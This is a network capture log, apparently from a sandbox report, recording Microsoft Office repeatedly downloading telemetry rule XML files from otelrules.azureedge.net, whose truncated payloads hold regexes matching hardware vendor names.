                                                                                x-ms-request-id: 24b39fc0-301e-0096-298c-15e71d000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093353Z-15767c5fc55gs96cphvgp5f5vc0000000c4g000000009wt2
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:53 UTC  477                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                23          192.168.2.5  55399        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:33:53 UTC  192                OUT        GET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:53 UTC  470                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:53 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 464
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                ETag: "0x8DC582B97FB6C3C"
                                                                                x-ms-request-id: dc68ccfc-201e-006e-438c-15bbe3000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093353Z-15767c5fc55sdcjq8ksxt4n9mc00000001hg00000000askx
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:53 UTC  464                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                24          192.168.2.5  55402        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:33:54 UTC  192                OUT        GET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:54 UTC  470                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:54 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 419
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                ETag: "0x8DC582B9748630E"
                                                                                x-ms-request-id: 0da94923-701e-0097-168c-15b8c1000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093354Z-15767c5fc55n4msds84xh4z67w000000064g000000000c45
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:54 UTC  419                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                25          192.168.2.5  55403        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:33:54 UTC  192                OUT        GET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:54 UTC  470                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:54 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 472
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                ETag: "0x8DC582B9DACDF62"
                                                                                x-ms-request-id: 8e9c869d-201e-000c-4b8c-1579c4000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093354Z-15767c5fc554w2fgapsyvy8ua00000000btg000000007b8w
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:54 UTC  472                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                26          192.168.2.5  55405        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:33:54 UTC  192                OUT        GET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:54 UTC  470                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:54 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 468
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                ETag: "0x8DC582B9C8E04C8"
                                                                                x-ms-request-id: 09e6f7ee-001e-0034-548c-15dd04000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093354Z-15767c5fc55dtdv4d4saq7t47n0000000c0000000000asrd
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:54 UTC  468                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                27 | 192.168.2.5 | 55404 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:54 UTC | 192 | OUT | GET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:54 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:54 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 404
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                ETag: "0x8DC582B9E8EE0F3"
                                                                                x-ms-request-id: 4f10c824-e01e-0085-1c8c-15c311000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093354Z-15767c5fc55jdxmppy6cmd24bn00000004eg00000000a09m
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:54 UTC | 404 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                28 | 192.168.2.5 | 55406 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:54 UTC | 192 | OUT | GET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:54 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:54 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 428
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                ETag: "0x8DC582BAC4F34CA"
                                                                                x-ms-request-id: 82f8b22c-c01e-0014-5a8c-15a6a3000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093354Z-15767c5fc55rv8zjq9dg0musxg0000000c90000000008e15
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:54 UTC | 428 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                29 | 192.168.2.5 | 55410 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:55 UTC | 192 | OUT | GET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:55 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:55 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 419
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                ETag: "0x8DC582BB32BB5CB"
                                                                                x-ms-request-id: c2ca9d4d-801e-0035-458c-15752a000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093355Z-15767c5fc55fdfx81a30vtr1fw0000000cm0000000009uh4
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:55 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                30 | 192.168.2.5 | 55411 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:55 UTC | 192 | OUT | GET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:55 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:55 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 494
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                ETag: "0x8DC582BB8972972"
                                                                                x-ms-request-id: 831ef799-b01e-0098-7b8c-15cead000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093355Z-15767c5fc554w2fgapsyvy8ua00000000bu0000000006w6m
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:55 UTC | 494 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                31 | 192.168.2.5 | 55407 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:55 UTC | 192 | OUT | GET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:55 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:55 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 499
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                ETag: "0x8DC582B98CEC9F6"
                                                                                x-ms-request-id: 30fd46b0-d01e-00a1-368c-1535b1000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093355Z-15767c5fc55rg5b7sh1vuv8t7n0000000cm0000000009bv2
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:55 UTC | 499 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                32 | 192.168.2.5 | 55408 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:55 UTC | 192 | OUT | GET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:55 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:55 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 415
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                ETag: "0x8DC582B988EBD12"
                                                                                x-ms-request-id: 6a901ce3-301e-005d-708c-15e448000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093355Z-15767c5fc55dtdv4d4saq7t47n0000000c5g00000000326x
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:55 UTC | 415 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                33 | 192.168.2.5 | 55409 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:55 UTC | 192 | OUT | GET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:55 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:55 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 471
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                ETag: "0x8DC582BB5815C4C"
                                                                                x-ms-request-id: 75493038-e01e-00aa-508c-15ceda000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093355Z-15767c5fc55ncqdn59ub6rndq00000000c10000000005634
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:55 UTC | 471 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                34 | 192.168.2.5 | 55413 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:56 UTC | 192 | OUT | GET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:56 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:56 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 427
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                ETag: "0x8DC582BA909FA21"
                                                                                x-ms-request-id: eccf174e-001e-0079-238c-1512e8000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093356Z-15767c5fc55qdcd62bsn50hd6s0000000c7g000000000hzy
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:56 UTC | 427 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                35 | 192.168.2.5 | 55415 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:56 UTC | 192 | OUT | GET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:56 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:56 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 486
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                ETag: "0x8DC582B92FCB436"
                                                                                x-ms-request-id: 76615707-c01e-0082-6a8c-15af72000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093356Z-15767c5fc55qkvj6n60pxm9mbw00000001dg000000008kcr
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:56 UTC | 486 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                36 | 192.168.2.5 | 55414 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:56 UTC | 192 | OUT | GET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:56 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:56 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 472
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                ETag: "0x8DC582B9D43097E"
                                                                                x-ms-request-id: 4b0a3852-c01e-00ad-3b8c-15a2b9000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093356Z-15767c5fc55tsfp92w7yna557w0000000cd0000000002gk5
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:56 UTC | 472 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                37 | 192.168.2.5 | 55412 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:56 UTC | 192 | OUT | GET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:56 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:56 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 420
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                ETag: "0x8DC582B9DAE3EC0"
                                                                                x-ms-request-id: a7623418-001e-00a2-348c-15d4d5000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093356Z-15767c5fc552g4w83buhsr3htc0000000cdg000000002cf3
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:56 UTC | 420 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                38 | 192.168.2.5 | 55416 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:56 UTC | 192 | OUT | GET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:56 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:56 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 423
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                ETag: "0x8DC582BB7564CE8"
                                                                                x-ms-request-id: bb2e28bd-501e-0016-0b8c-15181b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093356Z-15767c5fc55d6fcl6x6bw8cpdc0000000c90000000003nsb
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:56 UTC | 423 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                39 | 192.168.2.5 | 55421 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:57 UTC | 192 | OUT | GET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:57 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:57 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 479
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                ETag: "0x8DC582BB7D702D0"
                                                                                x-ms-request-id: 772ea1ab-e01e-003c-188c-15c70b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093357Z-15767c5fc55sdcjq8ksxt4n9mc00000001sg000000000655
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:57 UTC | 479 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                40 | 192.168.2.5 | 55420 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:57 UTC | 192 | OUT | GET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:57 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:57 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 400
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                ETag: "0x8DC582BB2D62837"
                                                                                x-ms-request-id: 9bed673a-001e-0046-278c-15da4b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093357Z-15767c5fc55lghvzbxktxfqntw0000000bzg00000000855q
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:57 UTC | 400 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                41 | 192.168.2.5 | 55418 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:57 UTC | 192 | OUT | GET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:57 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:57 GMT
